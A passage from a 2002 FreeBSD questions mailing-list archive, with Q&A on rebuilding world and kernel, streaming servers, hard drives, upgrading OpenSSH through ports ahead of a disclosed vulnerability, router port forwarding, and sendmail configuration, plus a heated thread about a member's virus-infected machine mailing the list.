<5.1.1.6.2.20020625143148.0421d118@pop3s.schulte.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 01:22 PM 6/25/2002 -0700, La Temperanza wrote: >I don't quite get what that means. >.< If a cvsup and rebuilding isn't >syncing them, what will? You need to make sure you install the new world and kernel at the same time, built from the same source. Take a look at this, read it all the way through.... a lot of info but it will pay off. http://www.freebsd.org/handbook/makeworld.html -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:40: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id D3BD737B400 for ; Tue, 25 Jun 2002 13:39:58 -0700 (PDT) Received: from daleco [12.145.236.48] by mail.gbronline.com (SMTPD32-7.10) id A4C66910104; Tue, 25 Jun 2002 15:38:30 -0500 Message-ID: <00d801c21c88$699b2360$30ec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: Subject: Shoutcast, Icecast ...?? Opinions, please... Date: Tue, 25 Jun 2002 15:39:32 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Looking for a viable alternative to Real Network$ ($$$$) for streaming audio to a group of 300-500 users (max) who will probably NEVER be listening at the same time. Anybody run these servers? What are pros and cons in your opinion? TIA, Kevin Kinsey PS> My opinion: Not sure. Either requires winamp, or something even a little more obscure, for Windoze, and most of those lusers only have RealPlayer anyway. So, it basically comes down to stabillity and security, as well as operation issues. That's why I'm asking for anyone who's using it now to speak up. I would definitely appreciate any responses.... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:43: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 4CB1137B401 for ; Tue, 25 Jun 2002 13:42:57 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Tue, 25 Jun 2002 13:42:55 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: "ro0t" Date: Tue, 25 Jun 2002 13:42:56 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: RE: any idea what this means? Reply-To: pjklist@ekahuna.com Cc: questions@FreeBSD.ORG In-reply-to: References: <20020625201004567.AAA767@empty1.ekahuna.com@pc02.ekahuna.com> X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020625204255625.AAA740@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 25 Jun 2002, at 16:25, ro0t boldly uttered: > Well when i bought the motherboard (Abit KT7A-RAID) i had plans for raid but > couldnt afford to buy 2 identical drives at that time. (i really still cant > lol) So at the time i bought the raid motherboard and disabled raid. but > seeing as i _need_ a drive now anyway i found this site > http://www.nexthardwareshop.com/ thru pricewatch.com. Lots of stuff fairly > cheap. They have some good deals on HDs (especially smaller/older ones) but the rest of the stuff doesn't impress me as being that unusually low. When I want truly cheap deals on stuff I either make smart bids on ebay merchandise, or go to one of the various surplus vendors. > I just dont know what brand. Im pretty sure im going to get another > seagate. I had a western digital fail on me, and i had many maxtors fail. > (over 3 in 4 years) However i must admit i could get two 120 gigabyte maxtor > hard drives for ony a little over 200 dollars at that site and raid them > out... *tempting* Im pretty stuck at what im going to do. But i would rather > have longevity, and stability so i may get two 80 or 60 gig seagates. :) There are a lot of differences between particular series within the same manufacturer. Seagate has made a lot of junk, it's just that they make some nice drives too - ie SCSI server drives. In IDE, their "medalist" IDE drives were junky, and their modern "barracuda" IDE drives are pretty good. Bear in mind that Maxtor has been through various changes. In the old days, Maxtor made great stuff - they were the first company to break the 5400 rpm barrier with their "Magic" MXT 6300 rpm SCSI drives, and they were state-of-the-art back then. (before Seagate introduced the Barracuda series) A few yrs later they were going through hard times, sold themselves to a Korean conglomerate, muddled around for a while. Eventually their stuff improved, and they bought Quantum, gaining lots of excellent technology, and the very highly- regarded Atlas 7200 and 10K rpm SCSI series. Modern Maxtor stuff seems to get decent reviews. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:45:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id DC6FC37B400 for ; Tue, 25 Jun 2002 13:45:05 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PKj5Fv056496; Tue, 25 Jun 2002 16:45:07 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "Chad Albert" , Subject: RE: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 16:45:03 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <005a01c21c88$7afe2080$51b41595@SPGCALBERTA> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: Chad Albert [mailto:chadalbert@mchsi.com] Sent: Tuesday, June 25, 2002 4:40 PM To: ro0t Subject: Re: I hate to bring it up again (spamming) Well, from watching this list lately... More and more pinheads are able to figure it out everyday ;-) The virus they guy has emails itself to everyone in his address book. I can't believe he hasn't figured it out yet. Either he is a true idiot, or he left his email client up while he went on vacation --- which brings me back to the true idiot idea. Regards, Chad Thanks for pointing that out. That is definitely the most logical explanation. It still doesnt fix the actual problem which is this list getting *spammed* or viruses sent to unsuspecting people. So i guess ill be the better man, and be the first one to email him and tell him hes infected so he secures his shit properly like he should have done in the first place. Cause it seems everyone here would rather flame the victim then fix the problem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:51:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id A6DF037B400 for ; Tue, 25 Jun 2002 13:51:13 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PKp7Fv056657; Tue, 25 Jun 2002 16:51:08 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "Jeff Jirsa" , Subject: RE: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 16:51:05 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020625134011.I38104-100000@boris.st.hmc.edu> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: Jeff Jirsa [mailto:jeff@boris.st.hmc.edu] Sent: Tuesday, June 25, 2002 4:46 PM To: ro0t Subject: RE: I hate to bring it up again (spamming) On Tue, 25 Jun 2002, ro0t wrote: > > Then why dont you explain to the list why you are still talking. All i know > is i joined this list to help people, and im getting sent viruses, and spam > for some loser with nothing better to do then mail people who dont want it.. > Does anyone on this list want those emails and viruses sent to there email? > please speak now? > The person isn't sending you viruses on purpose, he's infected, and probably doesn't even know what's going on. Attacking them is probably going to hurt him more than it's going to help everyone else. The virus is easy to spot (Fw: ) and it doesn't even infect Outlook users until it's clicked. Ignore it, or send an email telling the person how dumb they are, but there's no reason to try to attack it. - Jeff Well like i said, i thought at first it was someone being a real idiot. Which i have no sympathy for. Then the last guy who emailed us enlightened me and made me think further of how he could be the victim also. It makes much sense. Im not attacking anyone. I just was upset because everything that is a good thing nowadays seems to get ruined by a ten year old with too much time on his hands. Anyhow im done discussing this its bull*hit. Anybody need help on _FreeBSD_ =] And i apologize for jumping the gun, without fully thinking out the situation. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:59:42 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id 11F8C37B400 for ; Tue, 25 Jun 2002 13:59:36 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5PKxY4W050344; Tue, 25 Jun 2002 21:59:34 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5PKxSIf050343; Tue, 25 Jun 2002 21:59:28 +0100 (BST) Date: Tue, 25 Jun 2002 21:59:28 +0100 From: Matthew Seaman To: Scott Mitchell Cc: Christopher Schulte , Lord Raiden , Marco Radzinschi , FreeBDS-Questions Subject: Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020625205928.GA50230@happy-idiot-talk.infracaninophi> References: <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> <20020624234646.G22328-100000@mail.radzinschi.com> <4.2.0.58.20020625134233.009992b0@pop.netzero.net> <5.1.1.6.2.20020625124040.041c50f0@pop3s.schulte.org> <20020625205840.B381@fishballoon.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625205840.B381@fishballoon.dyndns.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 08:58:40PM +0100, Scott Mitchell wrote: > With previous ssh vulnerabilities I've been able to just patch the base > system, by rebuilding the world or using the patch included with the > advisory. However, to get to 3.3 it looks like I'd need to install a port. > There are two OpenSSH ports: security/openssh and security/openssh-portable > What's the difference between these two ports? security/openssh is the straight OpenBSD code, also used in NetBSD. security/openssh-portable is the modified portable version everyone else uses. The main difference is that openssh-portable includes pam support. > Which one should I install to deal with this vulnerability? Either will do: however the plan is that OpenSSH as supplied in the base system will be upgraded to OpenSSH portable in the very near future. As there shouldn't be too many FreeBSD specific modifications to the portable code, it's likely that we'll be tracking new releases of OpenSSH rather more closely than has been the case up to now. I'd install openssh-portable 3.3p1 now, before the full disclosure of the vulnerability on (I think) Thursday, which should tide you over until the base system gets 3.4p1 with the full patch. You need to install 3.3p1 from a ports tree cvsup'd sometime after last night to get the separation of privilege thing, which will provide almost complete protection from the security hole. Remember to copy your host keys to /usr/local/etc: cd /etc/ssh cp ssh_host*key* /usr/local/etc/ and set: sshd_program="usr/local/sbin/sshd" in /etc/rc.conf to use the new daemon by default. Cheers, Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14: 8:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id AA9E337B422 for ; Tue, 25 Jun 2002 14:07:37 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PL7fFv057245 for ; Tue, 25 Jun 2002 17:07:41 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: Subject: cannot access my web server Date: Tue, 25 Jun 2002 17:07:38 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is way off topic, but i have searched every search engine i can think of. I know thats not an excuse but, im really stuck here and hoping someone knows what im doing wrong. Because of recent denial of service attacks against my website, i had to buy a hardware firewall router. Well now all my boxes are behind the router, including the clients. Whenever i try to go to any four of my domains, instead of seeing my website, the router config passwd box pops up. My last router did not do this. And no matter what i do i cannot get it to work. I understand i can go to http://192.168.1.80 which is the internal lan address of the freebsd server, but you have to understand that everything links to http://www.unixhideout.com such as images, and also how would my vhosts work? like http://freebsd.unixhideout.com and https://email.unixhideout.com ? The ports are forwarded correctly, and i am specifying local ips for both the clients and servers and yes the ports are forwarded and configured to the servers correctly. FYI the router in question is a Netgear R0318. And before i get flamed i did call tech support and search the net. I cant get someone on tech support for netgear that speaks english i understand, (im not being rude, i really just cant understand them i called 6 times with my eyes closed and full concentration and everytime i got a tech i couldnt understand.) Just an off topic question that i am truly stumped on. If you mind it just delete it. I wont post about it again. Im just almost certain someone on this list has my answers. sigh. Mike "ro0t" Network Administrator. The UnixHideout Network. http://www.unixhideout.com http://freebsd.unixhideout.com irc.unixhideout.com #Unixhideout To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14: 9:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from kramer.thekramers.net (dsl092-068-235.bos1.dsl.speakeasy.net [66.92.68.235]) by hub.freebsd.org (Postfix) with ESMTP id 9335D37B400 for ; Tue, 25 Jun 2002 14:09:07 -0700 (PDT) Received: from localhost (david@localhost) by kramer.thekramers.net (8.11.6/8.11.0) with ESMTP id g5PL95229490 for ; Tue, 25 Jun 2002 17:09:06 -0400 Date: Tue, 25 Jun 2002 17:09:05 -0400 (EDT) From: David Kramer To: freebsd-questions@FreeBSD.ORG Subject: RE: I hate to bring it up again (spamming) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, ro0t wrote: > Well like i said, i thought at first it was someone being a real idiot. > Which i have no sympathy for. Then the last guy who emailed us enlightened > me and made me think further of how he could be the victim also. It makes > much sense. Im not attacking anyone. I just was upset because everything > that is a good thing nowadays seems to get ruined by a ten year old with too > much time on his hands. Anyhow im done discussing this its bull*hit. Anybody > need help on _FreeBSD_ =] And i apologize for jumping the gun, without fully > thinking out the situation. A coupla things. -You posted easily six or so messages today complaining about the guy. How is that helping your fellow FreeBSD user? -It looks to me like you are taking messages that people have sent you in private (based on the header and the lack of the original post showing up on the list) and responding on the list, complete with the private mail contents. This is a blatant netiquette violation. If someone sent you something in private, it should stay that way. -"Never attribute to malice that which can more easily be attributed to incompetence" (unknown). Edwin Renders is clearly a newbie at best, and a luser at worst. Either way, he probably doesn't check his mail more than a few times a week. He could be sipping pina coladas by the poolside ignorant that all this is happening because he's got cablemodem or DSL access, and his machine is always connected whether he's there or not. -Even if he was doing it on purpose, responding to someone like that just makes them do it more. As a side comment, even without Edwin, I've never been on a technical list that got so much spam. ------------------------------------------------------------------- DDDD David Kramer http://thekramers.net DK KD DKK D "I went on a diet, swore off drinking and heavy eating, and DK KD in fourteen days I had lost exactly two weeks." DDDD -Joe E. Lewis To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:20: 9 2002 Delivered-To: freebsd-questions@freebsd.org Received: from www.omicnet.com (ip-208-181-72-171.adsl.radiant.net [208.181.72.171]) by hub.freebsd.org (Postfix) with ESMTP id AB51937B400 for ; Tue, 25 Jun 2002 14:20:01 -0700 (PDT) Received: from inspectorbox (130-94-160-46-dsl.hevanet.com [130.94.160.46]) by www.omicnet.com (8.9.3/8.9.2) with SMTP id OAA14899 for ; Tue, 25 Jun 2002 14:19:55 -0700 From: Joshua Lokken To: freebsd-questions@freebsd.org Date: Tue, 25 Jun 2002 14:18:52 -0700 X-Priority: 3 (Normal) Message-Id: Subject: Should I expect this? MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-Mailer: Opera 6.03 build 1107 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, list: Are these viruses just something I should expect from time to time? Of course, here at work, we have WinProxy, which, incidentally does a great job of detected and eliminating viruses before they get in, so it doen't really matter to me, but isn't there something that can be done before these posts make it out? Best Regards, Joshua Lokken OMIC Portland Branch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:22:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id 162B737B40B for ; Tue, 25 Jun 2002 14:22:14 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PLMBFv057802; Tue, 25 Jun 2002 17:22:14 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "Joshua Lokken" , Subject: RE: Should I expect this? Date: Tue, 25 Jun 2002 17:22:09 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Joshua Lokken Sent: Tuesday, June 25, 2002 5:19 PM To: freebsd-questions@FreeBSD.ORG Subject: Should I expect this? Hello, list: Are these viruses just something I should expect from time to time? Of course, here at work, we have WinProxy, which, incidentally does a great job of detected and eliminating viruses before they get in, so it doen't really matter to me, but isn't there something that can be done before these posts make it out? Best Regards, Joshua Lokken OMIC Portland Branch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message I have contacted him about it. I am waiting for a reply. As far as stopping spam and viruses this isnt my list. Youll have to ask whoever runs this list to do a better job of doing that. *cough To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:24: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id 42BE037B401 for ; Tue, 25 Jun 2002 14:23:56 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5PLNt4W050464; Tue, 25 Jun 2002 22:23:55 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5PLNo1D050463; Tue, 25 Jun 2002 22:23:50 +0100 (BST) Date: Tue, 25 Jun 2002 22:23:50 +0100 From: Matthew Seaman To: Jeff Penn Cc: freebsd-questions@FreeBSD.ORG Subject: Re: 4.6 sendmail: No local mailer defined Message-ID: <20020625212350.GB50230@happy-idiot-talk.infracaninophi> References: <20020625115332.A250@jrpenn.demon.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625115332.A250@jrpenn.demon.co.uk> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 11:53:32AM +0100, Jeff Penn wrote: > I had a look at /etc/mail/Makefile & noticed the make cf option. > Running this created jeff@jrpenn.demon.co.uk with .mc & cf > extensions. Do I only need to rename these files to create an > updated sendmail.cf?, or do I only need to rename freebsd.cf? > (apologies for not being brave enough to wade through the sendmail > documentation). Read the Makefile a bit closer... All you need to do is type: make install and the newly created .cf files will be renamed ready for use. Then type: make restart and sendmail will be restarted using your new files. > Should sendmail.cf be updated when running a new version of sendmail > to take advantage of new features?. Generally yes. Note that mergemaster will build new .cf files from your .mc files and prompt you to install them appropriately. Matthew PS. Does your `hostname' command really return 'jeff@jrpenn.demon.co.uk'? That's a bit weird. You might find changing that to just 'jrpenn.demon.co.uk' will increase your sanity quotient a bit. -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:30: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail2.ruraltel.net (mail2.ruraltel.net [24.225.0.35]) by hub.freebsd.org (Postfix) with ESMTP id 259EE37B401 for ; Tue, 25 Jun 2002 14:29:56 -0700 (PDT) Received: (from root@localhost) by mail2.ruraltel.net (8.11.6/8.11.6) id g5PLTmI10959 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 16:29:48 -0500 Received: from darryl (p189n31.ruraltel.net [24.225.31.189]) by mail2.ruraltel.net (8.11.6/8.11.6) with SMTP id g5PLTkq10928 for ; Tue, 25 Jun 2002 16:29:46 -0500 Reply-To: From: "Darryl Hoar" To: Subject: How to determine version of SSH Date: Tue, 25 Jun 2002 16:30:21 -0500 Message-ID: <002301c21c8f$833d9f30$0701a8c0@darryl> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Importance: Normal X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings, I have SSH installed on my firewall. How can I tell the version of ssh that I am running? I installed it from ports. I am running 4.4-stable. thanks for any info, Darryl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:35:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com (CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com [24.103.39.131]) by hub.freebsd.org (Postfix) with SMTP id 94EBA37B401 for ; Tue, 25 Jun 2002 14:35:48 -0700 (PDT) Received: (qmail 83324 invoked from network); 25 Jun 2002 21:36:08 -0000 Received: from unknown (HELO vsivyoung) (66.46.21.253) by cpe0004761ac738-cm00109515bc65.cpe.net.cable.rogers.com with SMTP; 25 Jun 2002 21:36:08 -0000 Message-ID: <01de01c21c90$7bd68580$c801a8c0@vsivyoung> From: "Miroslav Pendev" To: "ro0t" Cc: "freebsd-questions" References: Subject: Re: Should I expect this? Date: Tue, 25 Jun 2002 17:37:18 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Hello, list: > > Are these viruses just something I should expect from time to time? Of > course, here at work, we have WinProxy, which, incidentally does a > great job of detected and eliminating viruses before they get in, so it > doen't really matter to me, but isn't there something that can be done > before these posts make it out? > > > Best Regards, > > Joshua Lokken > OMIC Portland Branch > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > > I have contacted him about it. I am waiting for a reply. As far as stopping > spam and viruses this isnt my list. Youll have to ask whoever runs this list > to do a better job of doing that. *cough > How about some mail rules into your favorite e-mail client (Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)) for 'moving' these into the right direction (folder)? Or how about some mail filtering or virus checking on your mail server? I just did it and it works perfect! No viruses... just your questions... ;-> If you are good enough to use FreeBSD, I think, you must know at lest 3 more ways to stop these for yourself. About 'this isnt my list': Welcome to the real world! --Miro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:38:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id B8BA837B401 for ; Tue, 25 Jun 2002 14:37:15 -0700 (PDT) Received: from daleco [12.145.236.48] by mail.gbronline.com (SMTPD32-7.10) id A2322727006E; Tue, 25 Jun 2002 16:35:46 -0500 Message-ID: <011601c21c90$69ee79e0$30ec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: , References: <002301c21c8f$833d9f30$0701a8c0@darryl> Subject: Re: How to determine version of SSH Date: Tue, 25 Jun 2002 16:36:48 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I've seen a little confusion on this. Here's why: #sshd -v sshd: illegal option -- v sshd version OpenSSH_2.9 FreeBSD localisations 20020307 Usage: sshd [options] Options: -f file Configuration file (default /etc/ssh/sshd_config) -d Debugging mode (multiple -d means more debugging) -i Started from inetd -D Do not fork into daemon mode -q Quiet (no logging) -p port Listen on the specified port (default: 22) -k seconds Regenerate server key every this many seconds (default: 3600) -g seconds Grace period for authentication (default: 600) -b bits Size of server RSA key (default: 768 bits) -h file File from which to read host key (default: /etc/ssh/ssh_host_key) -u len Maximum hostname length for utmp recording -4 Use IPv4 only -6 Use IPv6 only As you can see, you do get a version number. I wonder why they didn't follow the convention and write in a "-v" option. HTH, KDK ----- Original Message ----- From: "Darryl Hoar" To: Sent: Tuesday, June 25, 2002 4:30 PM Subject: How to determine version of SSH > Greetings, > I have SSH installed on my firewall. How can I tell the version of ssh that > I am running? > I installed it from ports. > > I am running 4.4-stable. > thanks for any info, > Darryl > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 